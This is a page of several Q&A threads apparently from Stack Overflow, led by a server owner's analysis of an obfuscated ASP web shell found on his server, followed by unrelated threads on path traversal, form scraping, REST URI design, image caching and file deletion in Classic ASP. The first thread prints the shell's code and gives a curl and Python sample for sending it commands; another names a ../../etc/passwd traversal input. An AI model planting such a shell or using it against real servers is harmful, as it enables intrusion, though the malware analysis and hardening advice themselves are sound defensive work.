VB malware tool reverse-engineering - asp.net

I have found an interesting piece of malware on my server, which did some damage.
Now I am trying to reverse-engineer it, but due to a complete lack of knowledge of VB/ASP I need to ask for your help, colleagues.
<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/srerif/*/(tseuqer lave")
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED"))
if f.attributes <> 39 then
f.attributes = 39
end if
%>
As I understand it, it executes some command and marks a file somewhere with system/hidden attributes.
The main question is how to use it: from the logs I can see that the hacker uploaded this file and sent it commands via POST. I want to send it commands too, to understand how he was able to upload files to folders he should not have been able to write to.
Any advice is welcome. A sample curl POST would be amazing.

You don't need knowledge of VB to research what that code does; just read the documentation.
MorfiCoder(")/*/srerif/*/(tseuqer lave") returns eval request("firers") (I assume functions like Replace or StrReverse are obvious).
Execute and eval are self-explanatory; the documentation for the Request object says:
The Request object retrieves the values that the client browser passed to the server during an HTTP request.
So, whatever string is in the firers request variable will be executed (you said you already know that your attacker used a simple POST to send data to his script).
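Since you asked for a sample: a minimal sketch of how such a shell is driven, assuming the uploaded file sits at a hypothetical /uploads/shell.asp on your own test server (only run this against a machine you own):
import requests

# Hypothetical location of the uploaded shell on YOUR OWN test box.
url = "http://localhost/uploads/shell.asp"

# Whatever VBScript is in the 'firers' field gets eval'd server-side;
# this payload is a harmless probe that just echoes a marker into the response.
resp = requests.post(url, data={"firers": 'Response.Write("shell is alive")'})
print(resp.status_code, resp.text)
The curl equivalent would be curl --data 'firers=Response.Write("shell is alive")' http://localhost/uploads/shell.asp.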
Set fso=CreateObject("Scripting.FileSystemObject") creates a FileSystemObject object.
Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")) creates a File object, using the path in PATH_TRANSLATED (the physical path of the requested script itself).
Then the attribute value 39 = 1 (ReadOnly) + 2 (Hidden) + 4 (System) + 32 (Archive) is set on that file object (to hide this script).
Why your attacker was able to upload this file to your server obviously can't be answered from the information you provided; it would also be out of scope for this question and probably off-topic for Stack Overflow.

Related

Attack via filename passed in URL query?

I wrote a small service in Go (although I don't think this is a language-specific issue) that caches some results by saving them to a file, writing a URL query parameter into the filename as "prefix" + param + ".json" using ioutil.WriteFile. The service runs on Ubuntu.
Is it possible to do something malicious by passing an unexpected string via the query?
Relevant attacks that come to mind are called path injection (or path traversal). For example, what if the query parameter is something like ../../etc/passwd? (OK, this particular one would probably not work, since the user running the service should have no permissions there, but you get the point.) It could, for instance, be possible to overwrite your service code itself.
You should sanitize the parameter before adding it to the filename. Best would be a strict whitelist of allowed letters and numbers; anything else should be removed from the parameter. That way injection is not possible.
You can also check whether the path you are writing to is actually under an explicitly allowed directory, as in the sketch below.
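A minimal sketch of both checks, assuming a hypothetical cache directory (shown in Python; the question's Go service would do the same thing with regexp and path/filepath):
import os
import re

ALLOWED_DIR = "/var/cache/myservice"  # hypothetical cache directory

def safe_cache_path(param):
    # Whitelist: only letters and digits may appear in the cache key.
    if not re.fullmatch(r"[A-Za-z0-9]+", param):
        raise ValueError("invalid cache key")
    path = os.path.realpath(os.path.join(ALLOWED_DIR, "prefix" + param + ".json"))
    # Belt and braces: the resolved path must still be inside ALLOWED_DIR.
    if not path.startswith(ALLOWED_DIR + os.sep):
        raise ValueError("path escapes the cache directory")
    return path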
I will make a test in Python; here is the structure of the project:
app1/main.py
while True:
    a = input()  # stands in for the query parameter
    with open("{}.json".format(a), "w") as f:
        f.write("Hello world")
Now I am a hacker, and I want to change "yourfile.json",
so I pass yourfile as the input (the code appends ".json" itself),
and then the content of yourfile.json becomes: Hello world

Writing a function that scrapes a dataset that appears only after typing in values and clicking a button

I am trying to write a function that will take a list of dates and retrieve the dataset as found on https://www.treasurydirect.gov/GA-FI/FedInvest/selectSecurityPriceDate.htm
I am using PROC IML in SAS to execute R code (since I am more familiar with R).
My problem is within R, and is due to the website.
First, I am aware that there is an API, but this is a technique I really want to learn, because many sites do not have APIs.
Does anyone know how to retrieve the datasets?
Things I've heard:
Use RSelenium to program the clicking. But RSelenium was recently removed from CRAN, so that isn't an option (even installing an archived version is causing issues).
Watch how the XHR requests change in Chrome's Network tab as I click the "submit" button. However, the Network tab doesn't show anything for this site, whereas it does on other websites that use different search methods.
I have been looking for a solution all day, but to no avail! Please help
First, you need to read the terms and conditions and make sure that you are not breaking the rules when scraping.
Next, if there is an API, you should use it so that they can better manage their data usage and operations.
In addition, you should limit the number of requests you make so as not to overload the server. If I am not wrong, this is related to denial-of-service (DoS) attacks.
Finally, if the above conditions are satisfied, you can use the inspector in Chrome to see what HTTP requests are made when you browse these webpages.
In this particular case, you do not need RSelenium; a simple HTTP POST will do:
library(httr)

# Reproduce the form submission behind the "CSV Format" button.
resp <- POST("https://www.treasurydirect.gov/GA-FI/FedInvest/selectSecurityPriceDate.htm",
             body = list(
               priceDate.month = 5,
               priceDate.day   = 15,
               priceDate.year  = 2018,
               submit          = "CSV+Format"
             ),
             encode = "form")

# The body comes back as raw bytes; convert to text and parse (no header row).
read.csv(text = rawToChar(resp$content), header = FALSE)
You can perform the same HTTP processing in a SAS session using Proc HTTP. The CSV data does not contain a header row, so perhaps the XML format is more appropriate. There are a couple of caveats for the treasurydirect site.
Prior to posting a data-download request, the connection needs some cookies that are assigned during a GET request. Proc HTTP can do this.
The XML contains an extra container tag <bpd> that the SAS XMLV2 library engine can't handle simply. This extra tag can be removed with some DATA step processing.
Sample code for the XML format:
filename response TEMP;
filename respfilt TEMP;
* Get request sets up fresh session and cookies;
proc http
clear_cache
method = "get"
url ="https://www.treasurydirect.gov/GA-FI/FedInvest/selectSecurityPriceDate.htm"
;
run;
* Post request as performed by XML format button;
* automatically utilizes cookies setup in GET request;
* in= can now directly specify the parameter data to post;
proc http
method = "post"
in = 'priceDate.year=2018&priceDate.month=5&priceDate.day=15&submit=XML+Format'
url ="https://www.treasurydirect.gov/GA-FI/FedInvest/selectSecurityPriceDate.htm"
out = response
;
run;
* remove bpd tag from the response (the downloaded xml);
data _null_;
infile response;
file respfilt;
input;
if _infile_ not in: ('<bpd', '</bpd');
put _infile_;
run;
* copy data collections from xml file to tables in work library;
libname respfilt xmlv2 ;
proc copy in=respfilt out=work;
run;
Reference material
REST at Ease with SAS®: How to Use SAS to Get Your REST
Joseph Henry, SAS Institute Inc., Cary, NC
http://support.sas.com/resources/papers/proceedings16/SAS6363-2016.pdf

Designing proper REST URIs

I have a Java component which scans through a set of folders (input/processing/output) and returns the list of files in JSON format.
The REST URL for the same is:
GET http://<baseurl>/files/<foldername>
Now, I need to perform certain actions on each of the files, like validate, process, delete, etc. I'm not sure of the best way to design the REST URLs for these actions.
Since it's direct file manipulation, I don't have any unique identifier for the files except their paths. So I'm not sure if the following is a good URL:
POST http://<baseurl>/file/validate?path=<filepath>
Edit: I would ideally have liked to use something like /file/fileId/validate. But the only unique id a file has is its path, and I don't think I can use that as part of the URL itself.
And finally, I'm not sure which HTTP verb to use for such custom actions like validate.
When you implement a route like http://<baseurl>/file/validate?path=<filepath>, you encode the action in your resource; that's not a desired effect when modelling a resource-oriented service.
You could do the following for read operations:
GET http://api.example.com/files will return all files as URL references, such as:
http://api.example.com/files/path/to/first
http://api.example.com/files/path/to/second
...
GET http://api.example.com/files/path/to/first will return validation results for the file (I'm using JSON for readability):
{
  "name": "first",
  "valid": true
}
That was the simple read-only part. Now to the write operations:
DELETE http://api.example.com/files/path/to/first will of course delete the file
Modelling the file processing is the hard part, but you could model it as a top-level resource, so that:
POST http://api.example.com/FileOperation?operation=somethingweird will create a virtual file-processing resource and execute the operation given by the URL parameter 'operation'. Modelling these file operations as resources gives you the possibility to perform the operations asynchronously and to return a result with additional information about the progress of the operation, and so on.
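For instance (status codes and payload invented for illustration), an asynchronous operation could play out like this:
POST http://api.example.com/FileOperation?operation=process
  -> 202 Accepted
  -> Location: http://api.example.com/FileOperation/42
GET http://api.example.com/FileOperation/42
  -> { "status": "running", "progress": "40%" }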
You can take a look at the Amazon S3 REST API for additional examples and inspiration on how to model resources. I can highly recommend reading RESTful Web Services.
Now, I need to perform certain actions on each of the files, like validate, process, delete, etc. I'm not sure of the best way to design the REST URLs for these actions. Since it's direct file manipulation, I don't have any unique identifier for the files, except their paths. So I'm not sure if the following is a good URL: POST http://<baseurl>/file/validate?path=<filepath>
It's not. /file/validate doesn't describe a resource, it describes an action. That means it is functional, not RESTful.
Edit: I would have ideally liked to use something like /file/fileId/validate. But the only unique id for files is its path, and I don't think I can use that as part of the URL itself.
Oh yes you can! And you should do exactly that. Except for that final validate part; that is not a resource in any way, and so should not be part of the path. Instead, clients should POST a message to the file resource asking it to validate itself. Luckily, POST allows you to send a message to the file as well as receive one back; it's ideal for this sort of thing (unless there's an existing verb to use instead, whether in standard HTTP or one of the extensions such as WebDAV).
And finally, I'm not sure which HTTP verb to use for such custom actions like validate.
POST, with the action to perform determined by the content of the message that was POSTed to the resource. Custom “do something non-standard” actions are always mapped to POST when they can't be mapped to GET, PUT or DELETE. (Alas, a clever POST is not hugely discoverable and so causes problems for the HATEOAS principle, but that's still better than violating basic REST principles.)
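A sketch of such an exchange (message shapes invented for illustration):
POST http://api.example.com/files/path/to/first
{ "action": "validate" }
  -> 200 OK
  -> { "valid": false, "violations": [ "bad checksum" ] }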
REST requires a uniform interface, which in HTTP means limiting yourself to GET, PUT, POST, DELETE, HEAD, etc.
One way you can check on each file's validity in a RESTful way is to think of the validity check not as an action to perform on the file, but as a resource in its own right:
GET /file/{file-id}/validity
This could return a simple True/False, or perhaps a list of the specific constraint violations. The file-id could be a file name, an integer file number, a URL-encoded path, or perhaps an unencoded path like:
GET /file/bob/dir1/dir2/somefile/validity
Another approach would be to ask for a list of the invalid files:
GET /file/invalid
And still another would be to prevent invalid files from being added to your service in the first place, i.e., when your service processes a PUT request with bad data:
PUT /file/{file-id}
it rejects it with an HTTP 400 (Bad Request). The body of the 400 response could contain information on the specific error.
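For example (payload shape invented for illustration):
HTTP/1.1 400 Bad Request
{ "error": "validation failed", "violations": [ "missing header row" ] }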
Update: To delete a file you would of course use the standard HTTP REST verb:
DELETE /file/{file-id}
To 'process' a file, does this create a new file (resource) from one that was uploaded? For example Flickr creates several different image files from each one you upload, each with a different size. In this case you could PUT an input file and then trigger the processing by GET-ing the corresponding output file:
PUT /file/input/{file-id}
GET /file/output/{file-id}
If the processing isn't near-instantaneous, you could generate the output files asynchronously: every time a new input file is PUT into the web service, the web service starts up an asynchronous activity that eventually results in the output file being created.
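Sketched as a request flow, with an invented file name and one reasonable choice of status codes:
PUT http://api.example.com/file/input/report.csv    -> 201 Created
GET http://api.example.com/file/output/report.csv   -> 404 Not Found (not processed yet)
GET http://api.example.com/file/output/report.csv   -> 200 OK (processing finished)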

stupid caching in asp.net

I use code like this:
string.Format("<img src='{0}'><br>", u.Avatar);
u.Avatar is something like '/img/path/pic.jpg'.
On this site I can upload a new image in place of the old pic.jpg, so the picture is new but the name stays the same, and the browser shows the OLD (cached) picture. If I append a random number, like /img/path/pic.jpg?123, it works fine, but I only need that after an upload, not always. How can I solve this?
Append the file's last-modified timestamp instead of a random number:
string imgUrl = string.Format(
    "<img src='{0}?{1}'><br>",
    u.Avatar,
    // Placeholder helper: look up the file's last-modified time on disk.
    FunctionThatLookupFileSystemForItsLastModified(u.Avatar).Ticks.ToString());
Instead of linking to the images directly, consider setting up a generic HTTP handler to serve the images.
MSDN: HTTP Handlers and HTTP Modules Overview
Stack Overflow: How to use output caching on .ashx handler
Append DateTime.Now.Ticks to the image URL:
string imgUrl = string.Format("<img src='{0}?{1}'><br>", u.Avatar, DateTime.Now.Ticks);
EDIT: I don't think this is best practice, or even a practice I would use myself. It is just a suggestion, given the limited information, in case the Random implementation isn't truly random.
I read your post again... sorry for the overly general answer.
To work around it, do the following:
On Application_Start, create a Dictionary for uploaded images and save it on the Application object, initially empty. Once you upload an image, add it to this Dictionary. Wrap every place avatars appear on your website with a function that looks the image up in the Dictionary: if found, return imagename.jpg?randomnumber and then delete the entry from the Dictionary; otherwise return just imagename.jpg.
This is going to be heavy, because you will need to check the Dictionary for each image, but it will do exactly what you need.
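A minimal sketch of that bookkeeping, with invented helper names (Python for brevity; in ASP.NET the dictionary would live on the Application object):
import random

recently_uploaded = {}  # image name -> cache-busting token

def on_upload(image_name):
    # Remember that this image just changed, with a fresh token.
    recently_uploaded[image_name] = random.randrange(10**9)

def avatar_url(image_name):
    # Serve name?token exactly once after an upload, then the bare name again.
    token = recently_uploaded.pop(image_name, None)
    return "{}?{}".format(image_name, token) if token is not None else image_name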
You can set a cache dependency using the System.Web.Caching.CacheDependency class.
This can set the dependency on the uploaded file, and will release the cache for that file automatically when the file changes.
There are lots of articles on MSDN and elsewhere, so I won't go into all the details here.
You can do inserts, deletes and other cache management using the tools available.
(And this does not require you to change the file names or tack anything on; it knows from the file system that the file changed.)

Send file using Response.BinaryWrite() and delete it afterwards

As part of a Classic ASP project, the user should be able to download a file, which is dynamically extracted from a zip archive and sent via Response.BinaryWrite(), by simply calling "document.asp?id=[some id here]".
Extracting and sending is not the problem, but I need to delete the extracted file after the download has finished. I have never done any ASP or VBA before, and I guess that's why I'm stuck here.
I tried deleting the file right after Response.BinaryWrite() using FileSystemObject.DeleteFile(), but this results in a 404 error on the client side.
How can I wait until the download has finished and then perform additional actions?
Edit: This is what my code looks like:
'Unzip a specified file from an archive and put its path in *document*
set stream = Server.CreateObject("ADODB.Stream")
stream.Open
stream.Type = 1 ' binary
stream.LoadFromFile(document)
Response.BinaryWrite(stream.Read)
'Here I want to delete the *document*
I suspect that at the point you are calling the DeleteFile method, the file you are trying to delete is still locked by something else; the question is by what?
Try including:
stream.Close()
after your BinaryWrite. Also make sure you've done a similar thing with the component you used to extract the file. If the component doesn't offer any obvious "close" method, try assigning Nothing to the variables referencing it.
Is it not possible to extract the file into memory, then binary-write the stream to the browser? That way the file is never created on the server and there is no need to delete it.
I found a solution: the extracted files are saved in a special directory, and every time a user runs document.asp it checks this directory for files older than one hour and deletes them.
I think it's the simplest way to manage this, though I would still prefer a solution where the document is deleted right after downloading.
